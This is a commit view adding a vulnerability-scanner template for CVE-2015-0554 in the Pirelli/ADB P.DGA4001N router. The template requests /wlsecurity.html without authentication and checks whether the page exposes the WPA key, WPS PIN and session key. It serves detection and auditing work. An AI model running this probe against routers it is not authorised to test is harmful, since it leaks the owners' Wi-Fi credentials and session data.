Merge pull request #3376 from daffainfo/patch-283

Create CVE-2015-0554.yaml
patch-1
Prince Chaddha 2021-12-20 13:02:59 +05:30 committed by GitHub
commit 5691435c26
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: CVE-2015-0554
info:
name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
author: daffainfo
severity: high
description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
reference:
- https://www.exploit-db.com/exploits/35721
- https://nvd.nist.gov/vuln/detail/CVE-2015-0554
tags: cve,cve2015,pirelli,router,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/wlsecurity.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var wpapskkey"
- "var WscDevPin"
- "var sessionkey"
condition: and
- type: status
status:
- 200